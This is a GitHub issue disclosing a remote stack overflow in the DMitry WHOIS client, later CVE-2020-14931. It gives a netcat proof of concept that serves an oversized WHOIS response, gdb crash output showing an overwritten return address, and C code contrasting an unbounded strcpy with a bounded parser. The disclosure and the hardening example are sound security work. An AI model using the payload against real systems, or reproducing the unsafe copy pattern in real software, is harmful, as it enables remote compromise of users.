
Remote Stack Overflow (possible RCE) #4

Closed
carter-yagemann opened this issue Jun 19, 2020 · 1 comment

Comments

carter-yagemann (Contributor) commented Jun 19, 2020

Continuing my analysis, I found that this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.

This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.

PoC:

For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:

127.0.0.1       Af.whois-servers.net

Next, I use nc to act as the WHOIS server:

echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43

While that's running, let's see what happens in DMitry:

$ gdb ./dmitry 
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf

Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU

Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141		if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0  0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1  0x4141555555557dfc in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x41417fffffffe240 in ?? ()
#4  0x4e206e69616d6f44 in ?? ()
#5  0x6f6f66203a656d61 in ?? ()
#6  0x206e69616d6f440a in ?? ()
#7  0x203a737574617453 in ?? ()
#8  0x414141410a726162 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]

Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.
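The crash above is the classic shape of a WHOIS response line copied into a fixed-size stack buffer without a length check: the 0x4141... frames are the 'A' bytes that overwrote the saved return address. The following is an added example, not DMitry's code and not the patch for CVE-2020-14931. It shows the unsafe copy pattern next to a hardened line formatter that treats the response as untrusted bytes with an explicit length, bounds every copy, always NUL-terminates, and counts lines it had to truncate or drop. The buffer size (128), the line cap (16) and the helper names are assumptions chosen for illustration; the sample response is constructed to match the PoC on this page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes for illustration; DMitry's real buffer sizes in
 * src/nwhois.c are not given on this page. */
#define LINE_MAX_LEN 128
#define MAX_LINES 16

/* Vulnerable pattern (illustrative, NOT DMitry's code): a response line
 * is copied into a fixed-size stack buffer with no length check. A WHOIS
 * server, or an on-path attacker since WHOIS is plaintext TCP, that sends
 * a line longer than LINE_MAX_LEN-1 bytes writes past frmtdbuff into the
 * saved return address. Only ever call this with a line you know is short. */
static void unsafe_format_line(const char *line, char *out)
{
    char frmtdbuff[LINE_MAX_LEN];
    strcpy(frmtdbuff, line);            /* unbounded copy: stack overflow */
    strcpy(out, frmtdbuff);             /* caller must size out >= LINE_MAX_LEN */
}

struct whois_lines {
    char line[MAX_LINES][LINE_MAX_LEN];
    size_t count;      /* lines stored */
    size_t truncated;  /* lines longer than LINE_MAX_LEN-1 that were cut */
    size_t dropped;    /* lines beyond MAX_LINES that were discarded */
};

/* Hardened formatter: takes the raw response with an explicit length (it
 * need not be NUL-terminated), splits on '\n', strips a trailing '\r',
 * bounds each copy to LINE_MAX_LEN-1 bytes and never stores more than
 * MAX_LINES lines. Oversized input degrades to truncation, not corruption. */
static void safe_format_response(const char *resp, size_t resp_len,
                                 struct whois_lines *out)
{
    memset(out, 0, sizeof(*out));
    size_t start = 0;
    for (size_t i = 0; i <= resp_len; i++) {
        int end_of_line = (i == resp_len) || resp[i] == '\n';
        if (!end_of_line)
            continue;
        size_t len = i - start;
        if (len > 0 && resp[start + len - 1] == '\r')
            len--;                                  /* tolerate CRLF */
        /* An empty remainder after the final '\n' is not a line;
         * an empty line in the middle of the response is kept. */
        if (len > 0 || i < resp_len) {
            if (out->count < MAX_LINES) {
                if (len > LINE_MAX_LEN - 1) {
                    len = LINE_MAX_LEN - 1;
                    out->truncated++;
                }
                memcpy(out->line[out->count], resp + start, len);
                out->line[out->count][len] = '\0';
                out->count++;
            } else {
                out->dropped++;
            }
        }
        start = i + 1;
    }
}

/* Builds a constructed response shaped like the nc PoC on this page:
 * two ordinary lines followed by a line of n_a 'A' bytes.
 * Returns the response length, or 0 if it does not fit in buf. */
static size_t build_poc_response(char *buf, size_t cap, size_t n_a)
{
    const char *head = "Domain Name: foo\nDomain Status: bar\n";
    size_t hl = strlen(head);
    if (hl + n_a + 1 > cap)
        return 0;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', n_a);
    buf[hl + n_a] = '\n';
    return hl + n_a + 1;
}

int main(void)
{
    char buf[1024];
    struct whois_lines w;
    size_t n = build_poc_response(buf, sizeof buf, 300);
    safe_format_response(buf, n, &w);
    printf("stored %zu lines, truncated %zu, dropped %zu\n",
           w.count, w.truncated, w.dropped);
    for (size_t i = 0; i < w.count; i++)
        printf("[%zu] %.40s%s\n", i, w.line[i],
               strlen(w.line[i]) > 40 ? "..." : "");
    return 0;
}
```

The point of the hardened version is not the specific size but that the length of untrusted data never decides how many bytes get written; the destination does. Counting truncations also gives the caller a signal that a server sent something abnormal, which is worth logging for a tool that talks to arbitrary WHOIS servers over unauthenticated TCP.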

carter-yagemann (Contributor, Author) commented:
This vulnerability has been assigned CVE-2020-14931.
